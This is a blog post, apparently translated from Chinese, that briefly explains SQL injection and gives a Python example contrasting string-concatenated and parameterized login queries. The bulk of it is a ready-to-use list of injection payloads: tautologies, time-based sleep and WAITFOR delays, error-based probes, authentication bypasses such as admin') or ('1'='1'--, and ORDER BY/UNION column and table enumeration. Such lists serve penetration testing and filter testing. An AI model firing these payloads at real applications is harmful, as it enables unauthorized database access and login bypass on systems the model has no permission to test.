Generic Payload for SQL injection vulnerabilities
2022-10-9 21:50:44 Author: 猫因的安全

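SQL injection occurs when a web application does not validate user-supplied input, or filters it too loosely. An attacker can append additional SQL statements to the end of a query that the web application has predefined and carry out unauthorized operations without the administrator's knowledge, tricking the database server into executing arbitrary unauthorized queries and thereby obtaining the corresponding data.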
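The root cause described above, shown as an added example that is not part of the original article: a login query built by string concatenation next to the same query with bound parameters, both run against three of the payloads listed below. It assumes Python's built-in `sqlite3` module; the table, the account and the function names are constructed for illustration.

```python
import sqlite3

# Three payloads taken from the lists on this page.
PAGE_PAYLOADS = ["' OR 'x'='x", "' OR '' = '", "' OR 1 -- -"]


def make_db():
    # Constructed sample data: an in-memory table holding one account.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret-constructed')")
    return conn


def login_concat(conn, name, password):
    # Vulnerable form: input is pasted into the SQL text, so a quote in the
    # input closes the string literal and the remainder is parsed as SQL.
    sql = ("SELECT name FROM users WHERE name = '" + name +
           "' AND password = '" + password + "'")
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        # Unbalanced input breaks the statement; a syntax error here means
        # user input reached the SQL parser and is worth logging.
        return False


def login_param(conn, name, password):
    # Hardened form: placeholders bind the input as data, never as SQL.
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone() is not None


def compare(payloads):
    # Maps each payload to (concatenated result, parameterized result).
    conn = make_db()
    return {p: (login_concat(conn, "admin", p), login_param(conn, "admin", p))
            for p in payloads}


if __name__ == "__main__":
    for payload, (concat_ok, param_ok) in compare(PAGE_PAYLOADS).items():
        print(f"{payload!r:16} concatenated={concat_ok} parameterized={param_ok}")
```

With bound parameters the payload is compared as a literal password string, so the filter never has to recognize any of the variants listed on this page.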

Generic SQL injection payloads

' or '

-- or #

' OR '1

' OR 1 -- -

OR "" = "

" OR 1 = 1 -- -"

' OR '' = '

'='

'LIKE'

'=0--+

OR 1=1

' OR 'x'='x

' AND id IS NULL; --

'''''''''''''UNION SELECT '2

Time-based payloads

,(select * from (select(sleep(10)))a)

%2c(select%20*%20from%20(select(sleep(10)))a)

';WAITFOR DELAY '0:0:30'--

Generic error-based payloads

OR 1=1

OR 1=1#

OR x=y#

OR 1=1--

OR x=x--

OR 3409=3409 AND ('pytW' LIKE 'pytW

HAVING 1=1

HAVING 1=1#

HAVING 1=0--

AND 1=1--

AND 1=1 AND '%'='

WHERE 1=1 AND 1=0--

%' AND 8310=8310 AND '%'='

Authentication-based payloads

' or ''-'

' or '' '

' or ''&'

' or ''^'

' or ''*'

or true--

" or true--

' or true--

") or true--

') or true--

admin') or ('1'='1'--

admin') or ('1'='1'#

admin') or ('1'='1'/

ORDER BY and UNION payloads

1' ORDER BY 1--+

1' ORDER BY 2--+

1' ORDER BY 3--+

1' ORDER BY 1,2--+

1' ORDER BY 1,2,3--+

1' GROUP BY 1,2,--+

1' GROUP BY 1,2,3--+

' GROUP BY columnnames having 1=1 --

-1' UNION SELECT 1,2,3--+

' UNION SELECT sum(columnname ) from tablename --

-1 UNION SELECT 1 INTO @,@

-1 UNION SELECT 1 INTO @,@,@

1 AND (SELECT * FROM Users) = 1

'

AND MID(VERSION(),1,1) = '5';

' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --


Article source: http://mp.weixin.qq.com/s?__biz=Mzk0NjMyNDcxMg==&mid=2247497002&idx=1&sn=d55fba374eb374df1f13d0d9f3b78583&chksm=c30560adf472e9bbf33c96b63d5b077558c3e745ff4d4868f1e5fec03dd857a5f81019ead04d#rd